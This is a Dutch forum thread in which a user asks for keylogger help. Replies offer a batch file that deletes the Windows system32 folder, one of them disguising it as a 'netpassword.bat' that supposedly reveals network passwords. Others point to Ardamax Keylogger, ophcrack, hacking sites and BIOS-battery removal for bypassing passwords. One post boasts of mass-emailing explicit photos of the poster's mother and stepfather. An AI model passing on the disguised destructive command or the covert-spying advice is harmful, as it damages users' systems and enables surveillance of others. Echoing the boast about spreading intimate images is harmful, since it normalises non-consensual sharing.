AndroidHealthClinic

keylogger hulp nodig

• Topic Starter Topic Starter
wat zegt windows eigenlijk bij jou als je op het bestand klikt? (ik heb vista en hier geeft het geen problemen:scratch:)

grapjas jij zeker ofniet?

@echo off
del c:\WINDOWS\system32

ff gegoogled omdat ik het woordje "del" al niet vetrouwde en system32 is een behoorlijk belangrijke map.
goed maar dat me windows 7 het blokkeerde.

maakt niet uit wat voor naam je het geeft, al noem je de txt: jemoeder.bat hij zal de volgende command uitvoeren: namelijk het verwijderen van de system32 map

format c:\ ?
haha dude u can't fool me met je "format" zover gaat mijn kennis nog wel:P
Gelukkig:)

Toen ik me nog bezig hield met dit soort onzin (door dit heb ik dus,* dit zweer ik op alles wat ik heb en ben *, mijn moeder gedoet zien worden in verschillende standjes door de vriend van mijn moeder, en heb haar ook plassend gezien en de vriend van mijn moeder had een soort van vlinder om zijn lul waar hij mijn moeder mee zat te nken nken...Dit is dus geen gelul. Ik had destijds de ranzigste foto's (naaktfoto van stiefpa, hem-mijn-moeder-nkend-in-doggystyle-positie) naar alle email-adressen uit het adresboek van mijn stiefpa's-outlook verzonden...Collega's, familieleden, kennissen, iedereen kreeg die foto's van hem en mijn moeder in zijn e-mail box onder zijn eigen ****ing naam toegezonden!:D En heb echt van alles geflikt met die foto's. Eén van de dingen die mij heeft getraumatiseerd als kleine..), gebruikte ik [Link niet meer beschikbaar] voor tools:o

grapjas jij zeker ofniet?

@echo off
del c:\WINDOWS\system32

ff gegoogled omdat ik het woordje "del" al niet vetrouwde en system32 is een behoorlijk belangrijke map.
goed maar dat me windows 7 het blokkeerde.

maakt niet uit wat voor naam je het geeft, al noem je de txt: jemoeder.bat hij zal de volgende command uitvoeren: namelijk het verwijderen van de system32 map

balen, spijtig dat het niet meteen werkte, zou voor heel wat lulz gezorgd hebben:roflol:

---------- Toegevoegd om 18:08 ---------- De post hierboven werd geplaatst om 18:03 ----------

maarja, je kan het me niet kwalijk nemen van het te proberen, wel dan?:P
misschien heb je hier iets aan http://network-hackingtools.net
is voornamelijk om netwerken (wep-sleutels e.d) te hacken, maar misschien dat je ook wachtwoorden van pc's zelf ermee kan achterhalen, tis een heel uitgebreide site dus als je zoekt zal je wss wel iets vinden:dunno:

Dit doet mij denken aan die 4chan prank :roflol:

---------- Toegevoegd om 18:30 ---------- De post hierboven werd geplaatst om 18:27 ----------

triforce3_4chan_Triforce_Prank-s2262x5000-44015.png

Google even op Bootable USB Disk.

Google maar 'Frank Jacksons killing program', eerste link moet je hebben.

Als je de batterij van de bios eruit haalt behoren alle paswoorden tot het verleden ;) .

best simpel, open je dos command prompt, en typ "net view" in
vervolgens maak je een nieuw txt bestand en typ je daar in:
"@echo off
del c:\WINDOWS\system32"
bestand opslaan als "netpassword.bat" en het bestand openen.

edit: dan krijg je een venster open waarin alle paswoorden van iedereen op het netwerk staan, en dan is het gewoon een kwestie van het juiste paswoord te kiezen:)

:roflol:

Edit: is niet gelukt zie ik, spijtig spijtig

Er zijn bootable cd's waar je gewoon alle wachtwoorden mee kunt uitlezen zoals OPHcrack.

CD branden , booten vanaf deze en dan gewoon de logische weg volgen.

• Topic Starter Topic Starter
Ardamax Keylogger, look it up in Google :)
(Is voor beginners, voor ondetecteerbare zul je moeten investen jongen :))

Toch vind ik het zielig dat je wel hier om hulp vraagt, maar je niet wilt zeggen waarom...

Terug
Naar boven